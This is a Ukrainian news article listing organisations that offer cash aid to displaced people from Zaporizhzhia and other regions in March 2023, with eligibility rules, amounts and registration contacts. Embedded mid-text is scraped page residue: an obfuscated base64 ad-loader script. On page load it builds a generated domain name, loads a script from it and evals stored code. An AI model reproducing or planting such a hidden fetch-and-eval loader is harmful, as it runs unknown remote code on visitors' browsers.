Де у березні переселенці із Запорізької області можуть отримати грошову допомогу: список організацій

Грошова допомога внутрішньо переміщеним особам зараз доступна в різних регіонах.

Здебільшого фінансова підтримка для переселенців, які належать до вразливих категорій населення або до цього жодного разу не отримували кеш-допомогу.

Перелік організацій, які зараз приймають заявки від ВПО на грошову допомогу.

Грошова допомога від Gate to Ukraine

Хто може отримати грошову допомогу

Gate to Ukraine допомагає українським сім’ям, які проживають у зонах активних бойових дій або на деокупованих/окупованих територіях та мають неповнолітніх дітей. Організація надає одноразову допомогу.

Як зареєструватися на грошову допомогу

Заявку на допомогу можна залишити, заповнивши форму .

Після подачі заявки вона пройде перевірку, після чого її переведуть на англійську і опублікують на сайті. Україна. Коли організація отримує пожертву від спонсора, то перерахує гроші на вашу картку чи банківський рахунок.

Після отримання виплати одержувачів грошової допомоги просять записати коротку відеоподяку для вашого спонсора.

Грошова допомога від СОС Дитячі містечка

СОС Дитячі містечка відновили прийом заявок на отримання грошової допомоги.

Розмір грошової допомоги становить 2200 гривень на одного члена сім’ї (один з батьків та діти до 18 років). Виплати будуть здійснюватися протягом трьох місяців один раз на місяць.

Хто може отримати грошову допомогу

ті, хто раніше не отримував грошову допомогу від СОС Дитячі Містечка;сім’ї, які є прийомними сім’ями;дитячі будинки сімейного типу;піклувальникські сім’ї, де є хоча б одна дитина-сирота або дитина, позбавлена ​​батьківського піклування.

Грошова допомога надається в межах Київській, Житомирській, Чернігівській, Сумській, Харківській, Луганській, Донецькій, Запорізькій, Херсонській, Миколаївській, Одеській та Дніпропетровській областях.

Як зареєструватися на грошову допомогу

Одна сім’я може подати лише одну заявку. Щоб зареєструвати заявку, будь-ласка, заповніть форму за наступним посиланням. Заявки приймаються до 31.03.23 року.

Грошова допомога від Естонської ради у справах біженців

Естонська рада у справах біженців запроваджує програму, яка надає багатоцільову матеріальну допомогу для підтримки українців.

Хто може отримати грошову допомогу

Грошову допомогу можуть отримати переселенці та жителі небезпечних територій у Запорізькій, Донецькій, Луганській, Харківській, Сумській, Чернігівській, Херсонській, Миколаївській, Одеській областях, які відповідають певним критеріям уразливості . var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Розмір грошової допомоги — 2220 гривень на одну особу на період від 1 до 3 місяців, залежно від регіону. Грошові виплати призначаються щонайбільше на 5 членів одного домогосподарства.

Як зареєструватися на грошову допомогу

Жителі підконтрольних Україні територій мають зателефонувати до кол-центру.

Контакти: (067) 105 28 03, щодня з 9:00 до 19:00.

Жителі окупованих територій можуть залишити заявку на посилання в будні з 8:00 до 18:00.

Запит на отримання грошової допомоги можуть залишити за посиланням члени домогосподарств, у яких:

втрата годувальника домогосподарства, внаслідок бойових дій повністю втратили житло або житло зазнало значних руйнувань, інвалідність або тяжкий стан здоров’я,  одинока мати/батько з неповнолітніми діти; домогосподарства, де є жінка є годувальницею, малозабезпечені родини, в яких є неповнолітні діти, новонароджені, вагітні жінки та жінки, які годують новонароджених, люди похилого віку та інші.

Подробиці за посиланням: https://register.pagulasabi.ee/uk

Норвезька рада у справах біженців в Україні (NRC)

Норвезька рада у справах біженців в Україні (NRC) відкриває реєстрацію на отримання багатоцільової грошової допомоги для внутрішньо переміщених осіб та громадян України, які проживають в районах, постраждалих внаслідок бойових дій та потребують термінової фінансової підтримки для забезпечення основних потреб.

Реєстрація, що триватиме до 20 березня 2023 року, відкрита для всіх серед зазначених вище категорій, проте, грошову допомогу буде надано найуразливішим категоріям з-поміж людей, які зареєструвалися.

Сума допомоги становить 6660 грн, що дорівнює 2220 грн на три місяці на кожного члена сім’ї, але не більше як на п’ять осіб. Виплата здійснюється на український банківський рахунок або за допомогою переказу MoneyGram для людей, у яких немає банківського рахунку.

Для того, щоб зареєструватися, необхідно завантажити один із месенджерів WhatsApp або Viber на свій смартфон. Для реєстрації через WhatsApp треба додати до контактів номер 0 800 609 844 та відправити на нього повідомлення з текстом «Привіт».

Для реєстрації через Viber, треба буде відскакувати QR-код, який розміщений на картинці. Після цього у своєму діалоговому вікні ви отримаєте повідомлення з інструкціями, яких необхідно дотримуватися для успішної реєстрації.

Якщо через велике навантаження на систему виникнуть технічні збої, не хвилюйтесь і спробуйте зареєструватись пізніше. Для отримання додаткової інформації звертайтесь за номером «гарячої» лінії NRC 0 800 302 007 або напишіть нам на адресу електронної пошти ua.info@nrc.no. Більш детально з інструкцією для реєстрації можна ознайомитися на інфографіці нижче

З найбільш поширеними питаннями та відповідями за посиланням https://bit.ly/3IGv2Z0

Основна інформація щодо захисту песональних даних доступна до за посиланням https://bit.ly/3KPtqyT

Підписуйтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/de-u-berezni-pereselentsi-iz-zaporizkoyi-oblasti-mozhut-otrimati-groshovu-dopomogu-spisok-organizatsij/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top